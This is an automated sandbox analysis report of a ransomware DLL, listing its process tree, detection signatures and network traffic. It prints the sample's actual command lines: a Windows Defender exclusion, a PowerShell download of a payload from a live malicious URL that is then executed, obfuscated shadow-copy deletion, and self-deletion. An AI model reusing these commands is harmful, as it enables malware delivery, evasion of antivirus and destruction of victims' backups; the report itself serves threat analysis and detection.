Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
R7bv9d6gTH.dll

Overview

General Information

Sample name:R7bv9d6gTH.dll
renamed because original name is a hash value
Original sample name:a99d226d4adb07e5b2199a45775b4d7f.dll
Analysis ID:1568876
MD5:a99d226d4adb07e5b2199a45775b4d7f
SHA1:de70709475a627269d7838c9fb8121c7d773c106
SHA256:24152c92202a5618f5bbbc385e84c81974e199245c1dd0c5ea680e0b3cf6dcb7
Tags:dllRansomwareuser-abuse_ch
Infos:

Detection

Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Multi AV Scanner detection for submitted file
Sigma detected: Delete shadow copy via WMIC
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Deletes shadow drive data (may be related to ransomware)
Loading BitLocker PowerShell Module
May encrypt documents and pictures (Ransomware)
Modifies existing user documents (likely ransomware behavior)
Overwrites Mozilla Firefox settings
Powershell drops PE file
Sigma detected: Invoke-Obfuscation STDIN+ Launcher
Sigma detected: New RUN Key Pointing to Suspicious Folder
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Sigma detected: Shadow Copies Deletion Using Operating Systems Utilities
Sigma detected: Suspicious Ping/Del Command Combination
Suspicious powershell command line found
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to harvest and steal browser information (history, passwords, etc)
Uses ping.exe to check the status of other devices and networks
Uses ping.exe to sleep
Contains capabilities to detect virtual machines
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE / OLE file has an invalid certificate
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Potential Command Line Path Traversal Evasion Attempt
Sigma detected: PowerShell Web Download
Sigma detected: Powershell Defender Exclusion
Sigma detected: Startup Folder File Write
Sigma detected: Usage Of Web Request Commands And Cmdlets
Stores files to the Windows start menu directory
Stores large binary data to the registry
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication

Classification

  • System is w10x64
  • loaddll32.exe (PID: 5852 cmdline: loaddll32.exe "C:\Users\user\Desktop\R7bv9d6gTH.dll" MD5: 51E6071F9CBA48E79F10C84515AAE618)
    • conhost.exe (PID: 5836 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cmd.exe (PID: 1268 cmdline: cmd.exe /C rundll32.exe "C:\Users\user\Desktop\R7bv9d6gTH.dll",#1 MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • rundll32.exe (PID: 6784 cmdline: rundll32.exe "C:\Users\user\Desktop\R7bv9d6gTH.dll",#1 MD5: 889B99C52A60DD49227C5E485A016679)
        • cmd.exe (PID: 4932 cmdline: cmd /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "$env:tmp" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
          • conhost.exe (PID: 4784 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • powershell.exe (PID: 5348 cmdline: powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "$env:tmp" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
            • WmiPrvSE.exe (PID: 400 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)
        • cmd.exe (PID: 7040 cmdline: cmd /c powershell Invoke-WebRequest -Uri https://fiatie.top/seti/cnost5ty6y.cpl -Outfile $env:tmp\t5y6t5.exe MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
          • conhost.exe (PID: 5160 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • powershell.exe (PID: 5588 cmdline: powershell Invoke-WebRequest -Uri https://fiatie.top/seti/cnost5ty6y.cpl -Outfile $env:tmp\t5y6t5.exe MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
        • cmd.exe (PID: 6752 cmdline: cmd /c %temp%/t5y6t5.exe MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
    • cmd.exe (PID: 3300 cmdline: cmd /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "$env:tmp" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • powershell.exe (PID: 6752 cmdline: powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "$env:tmp" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
        • conhost.exe (PID: 3580 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • t5y6t5.exe (PID: 2924 cmdline: C:\Users\user\AppData\Local\Temp/t5y6t5.exe MD5: 616EDCD99B6C4FE02E25D31AE57C087C)
          • WMIC.exe (PID: 280 cmdline: c:\DydbAY\Dydb\..\..\Windows\Dydb\Dydb\..\..\system32\Dydb\Dydb\..\..\wbem\Dydb\DydbA\..\..\wmic.exe shadowcopy delete MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
            • conhost.exe (PID: 6324 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • WMIC.exe (PID: 5552 cmdline: c:\WUQpVs\WUQp\..\..\Windows\WUQp\WUQp\..\..\system32\WUQp\WUQp\..\..\wbem\WUQp\WUQpV\..\..\wmic.exe shadowcopy delete MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
            • conhost.exe (PID: 5244 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • cmd.exe (PID: 6360 cmdline: cmd.exe /C ping 1.1.1.1 -n 1 -w 3000 > Nul & Del /f /q "C:\Users\user\AppData\Local\Temp\t5y6t5.exe" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
            • conhost.exe (PID: 2540 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • PING.EXE (PID: 7888 cmdline: ping 1.1.1.1 -n 1 -w 3000 MD5: B3624DD758CCECF93A1226CEF252CA12)
    • cmd.exe (PID: 5036 cmdline: cmd /c powershell Invoke-WebRequest -Uri https://fiatie.top/seti/cnost5ty6y.cpl -Outfile $env:tmp\t5y6t5.exe MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • powershell.exe (PID: 3568 cmdline: powershell Invoke-WebRequest -Uri https://fiatie.top/seti/cnost5ty6y.cpl -Outfile $env:tmp\t5y6t5.exe MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
    • cmd.exe (PID: 4852 cmdline: cmd /c %temp%/t5y6t5.exe MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
  • t5y6t5.exe (PID: 4024 cmdline: "C:\Users\user\AppData\Local\Temp\t5y6t5.exe" MD5: 616EDCD99B6C4FE02E25D31AE57C087C)
    • WMIC.exe (PID: 7308 cmdline: c:\MUSKjq\MUSK\..\..\Windows\MUSK\MUSK\..\..\system32\MUSK\MUSK\..\..\wbem\MUSK\MUSKj\..\..\wmic.exe shadowcopy delete MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
      • conhost.exe (PID: 7316 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • WMIC.exe (PID: 8176 cmdline: c:\gdzXho\gdzX\..\..\Windows\gdzX\gdzX\..\..\system32\gdzX\gdzX\..\..\wbem\gdzX\gdzXh\..\..\wmic.exe shadowcopy delete MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
      • conhost.exe (PID: 4040 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cmd.exe (PID: 8184 cmdline: cmd.exe /C ping 1.1.1.1 -n 1 -w 3000 > Nul & Del /f /q "C:\Users\user\AppData\Local\Temp\t5y6t5.exe" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 4020 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • PING.EXE (PID: 7364 cmdline: ping 1.1.1.1 -n 1 -w 3000 MD5: B3624DD758CCECF93A1226CEF252CA12)
  • t5y6t5.exe (PID: 7380 cmdline: "C:\Users\user\AppData\Local\Temp\t5y6t5.exe" MD5: 616EDCD99B6C4FE02E25D31AE57C087C)
    • WMIC.exe (PID: 7832 cmdline: c:\HJKnzu\HJKn\..\..\Windows\HJKn\HJKn\..\..\system32\HJKn\HJKn\..\..\wbem\HJKn\HJKnz\..\..\wmic.exe shadowcopy delete MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
      • conhost.exe (PID: 7840 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • WMIC.exe (PID: 3968 cmdline: c:\WnmQCH\WnmQ\..\..\Windows\WnmQ\WnmQ\..\..\system32\WnmQ\WnmQ\..\..\wbem\WnmQ\WnmQC\..\..\wmic.exe shadowcopy delete MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
      • conhost.exe (PID: 7088 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cmd.exe (PID: 5532 cmdline: cmd.exe /C ping 1.1.1.1 -n 1 -w 3000 > Nul & Del /f /q "C:\Users\user\AppData\Local\Temp\t5y6t5.exe" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 592 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • PING.EXE (PID: 6952 cmdline: ping 1.1.1.1 -n 1 -w 3000 MD5: B3624DD758CCECF93A1226CEF252CA12)
  • notepad.exe (PID: 8092 cmdline: "C:\Windows\system32\NOTEPAD.EXE" C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Decryptfiles.txt MD5: 27F71B12CB585541885A31BE22F61C83)
  • cleanup
No configs have been found
No yara matches

Operating System Destruction

barindex
Source: Process startedAuthor: Joe Security: Data: Command: c:\DydbAY\Dydb\..\..\Windows\Dydb\Dydb\..\..\system32\Dydb\Dydb\..\..\wbem\Dydb\DydbA\..\..\wmic.exe shadowcopy delete, CommandLine: c:\DydbAY\Dydb\..\..\Windows\Dydb\Dydb\..\..\system32\Dydb\Dydb\..\..\wbem\Dydb\DydbA\..\..\wmic.exe shadowcopy delete, CommandLine|base64offset|contains: (, Image: C:\Windows\System32\wbem\WMIC.exe, NewProcessName: C:\Windows\System32\wbem\WMIC.exe, OriginalFileName: C:\Windows\System32\wbem\WMIC.exe, ParentCommandLine: C:\Users\user\AppData\Local\Temp/t5y6t5.exe, ParentImage: C:\Users\user\AppData\Local\Temp\t5y6t5.exe, ParentProcessId: 2924, ParentProcessName: t5y6t5.exe, ProcessCommandLine: c:\DydbAY\Dydb\..\..\Windows\Dydb\Dydb\..\..\system32\Dydb\Dydb\..\..\wbem\Dydb\DydbA\..\..\wmic.exe shadowcopy delete, ProcessId: 280, ProcessName: WMIC.exe

System Summary

barindex
Source: Process startedAuthor: Jonathan Cheong, oscd.community: Data: Command: cmd /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "$env:tmp", CommandLine: cmd /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "$env:tmp", CommandLine|base64offset|contains: rg, Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: loaddll32.exe "C:\Users\user\Desktop\R7bv9d6gTH.dll", ParentImage: C:\Windows\System32\loaddll32.exe, ParentProcessId: 5852, ParentProcessName: loaddll32.exe, ProcessCommandLine: cmd /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "$env:tmp", ProcessId: 3300, ProcessName: cmd.exe
Source: Registry Key setAuthor: Florian Roth (Nextron Systems), Markus Neis, Sander Wiebing: Data: Details: C:\Users\user\AppData\Local\Temp\t5y6t5.exe....dC...5dC...8.....C'..#..$.rL. "#..@..c" ..aHf\.ib.Hb..".c#0....`Y......bx.p.|............b.f.c...`.c...`.c..J[e...c....5\.`.......<`<`...l..`1. .)".."|.^7..L.,...8.....7...9<`., EventID: 13, EventType: SetValue, Image: C:\Users\user\AppData\Local\Temp\t5y6t5.exe, ProcessId: 2924, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\XPSUDTARW
Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: cmd /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "$env:tmp", CommandLine: cmd /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "$env:tmp", CommandLine|base64offset|contains: rg, Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: loaddll32.exe "C:\Users\user\Desktop\R7bv9d6gTH.dll", ParentImage: C:\Windows\System32\loaddll32.exe, ParentProcessId: 5852, ParentProcessName: loaddll32.exe, ProcessCommandLine: cmd /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "$env:tmp", ProcessId: 3300, ProcessName: cmd.exe
Source: Process startedAuthor: Florian Roth (Nextron Systems), Michael Haag, Teymur Kheirkhabarov, Daniil Yugoslavskiy, oscd.community, Andreas Hunkeler (@Karneades): Data: Command: c:\DydbAY\Dydb\..\..\Windows\Dydb\Dydb\..\..\system32\Dydb\Dydb\..\..\wbem\Dydb\DydbA\..\..\wmic.exe shadowcopy delete, CommandLine: c:\DydbAY\Dydb\..\..\Windows\Dydb\Dydb\..\..\system32\Dydb\Dydb\..\..\wbem\Dydb\DydbA\..\..\wmic.exe shadowcopy delete, CommandLine|base64offset|contains: (, Image: C:\Windows\System32\wbem\WMIC.exe, NewProcessName: C:\Windows\System32\wbem\WMIC.exe, OriginalFileName: C:\Windows\System32\wbem\WMIC.exe, ParentCommandLine: C:\Users\user\AppData\Local\Temp/t5y6t5.exe, ParentImage: C:\Users\user\AppData\Local\Temp\t5y6t5.exe, ParentProcessId: 2924, ParentProcessName: t5y6t5.exe, ProcessCommandLine: c:\DydbAY\Dydb\..\..\Windows\Dydb\Dydb\..\..\system32\Dydb\Dydb\..\..\wbem\Dydb\DydbA\..\..\wmic.exe shadowcopy delete, ProcessId: 280, ProcessName: WMIC.exe
Source: Process startedAuthor: Ilya Krestinichev: Data: Command: cmd.exe /C ping 1.1.1.1 -n 1 -w 3000 > Nul & Del /f /q "C:\Users\user\AppData\Local\Temp\t5y6t5.exe", CommandLine: cmd.exe /C ping 1.1.1.1 -n 1 -w 3000 > Nul & Del /f /q "C:\Users\user\AppData\Local\Temp\t5y6t5.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\t5y6t5.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\t5y6t5.exe, ParentProcessId: 4024, ParentProcessName: t5y6t5.exe, ProcessCommandLine: cmd.exe /C ping 1.1.1.1 -n 1 -w 3000 > Nul & Del /f /q "C:\Users\user\AppData\Local\Temp\t5y6t5.exe", ProcessId: 8184, ProcessName: cmd.exe
Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Users\user\AppData\Local\Temp\t5y6t5.exe....dC...5dC...8.....C'..#..$.rL. "#..@..c" ..aHf\.ib.Hb..".c#0....`Y......bx.p.|............b.f.c...`.c...`.c..J[e...c....5\.`.......<`<`...l..`1. .)".."|.^7..L.,...8.....7...9<`., EventID: 13, EventType: SetValue, Image: C:\Users\user\AppData\Local\Temp\t5y6t5.exe, ProcessId: 2924, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\XPSUDTARW
Source: Process startedAuthor: Christian Burkard (Nextron Systems): Data: Command: c:\DydbAY\Dydb\..\..\Windows\Dydb\Dydb\..\..\system32\Dydb\Dydb\..\..\wbem\Dydb\DydbA\..\..\wmic.exe shadowcopy delete, CommandLine: c:\DydbAY\Dydb\..\..\Windows\Dydb\Dydb\..\..\system32\Dydb\Dydb\..\..\wbem\Dydb\DydbA\..\..\wmic.exe shadowcopy delete, CommandLine|base64offset|contains: (, Image: C:\Windows\System32\wbem\WMIC.exe, NewProcessName: C:\Windows\System32\wbem\WMIC.exe, OriginalFileName: C:\Windows\System32\wbem\WMIC.exe, ParentCommandLine: C:\Users\user\AppData\Local\Temp/t5y6t5.exe, ParentImage: C:\Users\user\AppData\Local\Temp\t5y6t5.exe, ParentProcessId: 2924, ParentProcessName: t5y6t5.exe, ProcessCommandLine: c:\DydbAY\Dydb\..\..\Windows\Dydb\Dydb\..\..\system32\Dydb\Dydb\..\..\wbem\Dydb\DydbA\..\..\wmic.exe shadowcopy delete, ProcessId: 280, ProcessName: WMIC.exe
Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: cmd /c powershell Invoke-WebRequest -Uri https://fiatie.top/seti/cnost5ty6y.cpl -Outfile $env:tmp\t5y6t5.exe, CommandLine: cmd /c powershell Invoke-WebRequest -Uri https://fiatie.top/seti/cnost5ty6y.cpl -Outfile $env:tmp\t5y6t5.exe, CommandLine|base64offset|contains: rg, Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: loaddll32.exe "C:\Users\user\Desktop\R7bv9d6gTH.dll", ParentImage: C:\Windows\System32\loaddll32.exe, ParentProcessId: 5852, ParentProcessName: loaddll32.exe, ProcessCommandLine: cmd /c powershell Invoke-WebRequest -Uri https://fiatie.top/seti/cnost5ty6y.cpl -Outfile $env:tmp\t5y6t5.exe, ProcessId: 5036, ProcessName: cmd.exe
Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: cmd /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "$env:tmp", CommandLine: cmd /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "$env:tmp", CommandLine|base64offset|contains: rg, Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: loaddll32.exe "C:\Users\user\Desktop\R7bv9d6gTH.dll", ParentImage: C:\Windows\System32\loaddll32.exe, ParentProcessId: 5852, ParentProcessName: loaddll32.exe, ProcessCommandLine: cmd /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "$env:tmp", ProcessId: 3300, ProcessName: cmd.exe
Source: File createdAuthor: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research): Data: EventID: 11, Image: C:\Users\user\AppData\Local\Temp\t5y6t5.exe, ProcessId: 2924, TargetFilename: C:\Documents and Settings\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Decryptfiles.txt
Source: Process startedAuthor: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger: Data: Command: cmd /c powershell Invoke-WebRequest -Uri https://fiatie.top/seti/cnost5ty6y.cpl -Outfile $env:tmp\t5y6t5.exe, CommandLine: cmd /c powershell Invoke-WebRequest -Uri https://fiatie.top/seti/cnost5ty6y.cpl -Outfile $env:tmp\t5y6t5.exe, CommandLine|base64offset|contains: rg, Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: loaddll32.exe "C:\Users\user\Desktop\R7bv9d6gTH.dll", ParentImage: C:\Windows\System32\loaddll32.exe, ParentProcessId: 5852, ParentProcessName: loaddll32.exe, ProcessCommandLine: cmd /c powershell Invoke-WebRequest -Uri https://fiatie.top/seti/cnost5ty6y.cpl -Outfile $env:tmp\t5y6t5.exe, ProcessId: 5036, ProcessName: cmd.exe
Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "$env:tmp", CommandLine: powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "$env:tmp", CommandLine|base64offset|contains: ^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: cmd /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "$env:tmp", ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 3300, ParentProcessName: cmd.exe, ProcessCommandLine: powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "$env:tmp", ProcessId: 6752, ProcessName: powershell.exe
No Suricata rule has matched

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Source: https://fiatie.top/seti/cnost5ty6y.cplAvira URL Cloud: Label: malware
Source: https://fiatie.top/seti/cnost5ty6y.cpl-Outfile$env:tmpAvira URL Cloud: Label: malware
Source: R7bv9d6gTH.dllVirustotal: Detection: 28%Perma Link
Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
Source: R7bv9d6gTH.dllStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE, DLL
Source: unknownHTTPS traffic detected: 103.253.43.248:443 -> 192.168.2.6:49735 version: TLS 1.2
Source: unknownHTTPS traffic detected: 103.253.43.248:443 -> 192.168.2.6:49734 version: TLS 1.2
Source: R7bv9d6gTH.dllStatic PE information: DYNAMIC_BASE, NX_COMPAT
Source: Binary string: Z:\scvhost\Release\scvhost.pdb source: t5y6t5.exe, 00000013.00000000.2335924756.000000000063C000.00000002.00000001.01000000.00000004.sdmp, t5y6t5.exe, 0000001B.00000000.2475644812.000000000063C000.00000002.00000001.01000000.00000004.sdmp, t5y6t5.exe, 0000001E.00000000.2558250004.000000000063C000.00000002.00000001.01000000.00000004.sdmp, t5y6t5.exe.15.dr
Source: Binary string: Z:\lderd\Release\lderd.pdb source: R7bv9d6gTH.dll
Source: Binary string: Z:\lderd\Release\lderd.pdb source: R7bv9d6gTH.dll
Source: Binary string: Z:\scvhost\Release\scvhost.pdbl source: t5y6t5.exe, 00000013.00000000.2335924756.000000000063C000.00000002.00000001.01000000.00000004.sdmp, t5y6t5.exe, 0000001B.00000000.2475644812.000000000063C000.00000002.00000001.01000000.00000004.sdmp, t5y6t5.exe, 0000001E.00000000.2558250004.000000000063C000.00000002.00000001.01000000.00000004.sdmp, t5y6t5.exe.15.dr
Source: C:\Users\user\AppData\Local\Temp\t5y6t5.exeFile opened: D:\sources\migration\Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\t5y6t5.exeFile opened: D:\sources\replacementmanifests\Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\t5y6t5.exeFile opened: D:\sources\migration\wtr\Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\t5y6t5.exeFile opened: D:\sources\replacementmanifests\microsoft-activedirectory-webservices\Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\t5y6t5.exeFile opened: D:\sources\replacementmanifests\microsoft-client-license-platform-service-migration\Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\t5y6t5.exeFile opened: D:\sources\replacementmanifests\hwvid-migration-2\Jump to behavior

Networking

barindex
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 1.1.1.1 -n 1 -w 3000
Source: Joe Sandbox ViewASN Name: TELE-ASTeleAsiaLimitedHK TELE-ASTeleAsiaLimitedHK
Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: global trafficHTTP traffic detected: GET /seti/cnost5ty6y.cpl HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: fiatie.topConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /seti/cnost5ty6y.cpl HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: fiatie.topConnection: Keep-Alive
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global trafficHTTP traffic detected: GET /seti/cnost5ty6y.cpl HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: fiatie.topConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /seti/cnost5ty6y.cpl HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: fiatie.topConnection: Keep-Alive
Source: 3870112724rsegmnoittet-es.sqlite.19.drString found in binary or memory: `https://www.facebook.com/ equals www.facebook.com (Facebook)
Source: 3870112724rsegmnoittet-es.sqlite.19.drString found in binary or memory: `https://www.youtube.com/ equals www.youtube.com (Youtube)
Source: global trafficDNS traffic detected: DNS query: fiatie.top
Source: cert9.db.19.drString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
Source: cert9.db.19.drString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
Source: cert9.db.19.drString found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
Source: cert9.db.19.drString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
Source: cert9.db.19.drString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
Source: cert9.db.19.drString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
Source: cert9.db.19.drString found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
Source: cert9.db.19.drString found in binary or memory: http://ocsp.digicert.com0
Source: cert9.db.19.drString found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
Source: cert9.db.19.drString found in binary or memory: http://x1.c.lencr.org/0
Source: cert9.db.19.drString found in binary or memory: http://x1.i.lencr.org/0
Source: 3870112724rsegmnoittet-es.sqlite.19.drString found in binary or memory: https://MD8.mozilla.org/1/m
Source: 3870112724rsegmnoittet-es.sqlite.19.drString found in binary or memory: https://account.bellmedia.c
Source: 3870112724rsegmnoittet-es.sqlite.19.drString found in binary or memory: https://allegro.pl/
Source: 3870112724rsegmnoittet-es.sqlite.19.drString found in binary or memory: https://bugzilla.mo
Source: prefs.js.19.drString found in binary or memory: https://contile-images.services.mozilla.com/T23eBL4EHswiSaF6kya2gYsRHvdfADK-NYjs1mVRNGE.3351.jpg
Source: loaddll32.exe, 00000000.00000002.2323020137.0000000000BEF000.00000004.00000020.00020000.00000000.sdmp, R7bv9d6gTH.dllString found in binary or memory: https://digify.com/a/#/access/login
Source: R7bv9d6gTH.dllString found in binary or memory: https://digify.com/a/#/access/logincmd
Source: R7bv9d6gTH.dllString found in binary or memory: https://fiatie.top/seti/cnost5ty6y.cpl
Source: cmd.exe, 0000000B.00000002.2319859211.0000000003170000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000C.00000002.2333239112.00000000035C0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://fiatie.top/seti/cnost5ty6y.cpl-Outfile$env:tmp
Source: extensions.json.19.drString found in binary or memory: https://github.com/mozilla/webcompat-reporter
Source: prefs.js.19.drString found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4pLk4pqk4pbW1pbWfpbW7ReNxR3UIG8zInwYIFIVs9eYi
Source: 3870112724rsegmnoittet-es.sqlite.19.drString found in binary or memory: https://login.live.com
Source: 3870112724rsegmnoittet-es.sqlite.19.drString found in binary or memory: https://login.microsoftonline.com
Source: extensions.json.19.drString found in binary or memory: https://screenshots.firefox.com/
Source: places.sqlite.19.drString found in binary or memory: https://support.mozilla.org
Source: places.sqlite.19.drString found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
Source: favicons.sqlite.19.drString found in binary or memory: https://support.mozilla.org/products/firefox
Source: places.sqlite.19.drString found in binary or memory: https://support.mozilla.org/products/firefoxgro.allizom.troppus.ZAnPVwXvBbYt
Source: 3870112724rsegmnoittet-es.sqlite.19.drString found in binary or memory: https://twitter.com/
Source: 3870112724rsegmnoittet-es.sqlite.19.drString found in binary or memory: https://weibo.com/
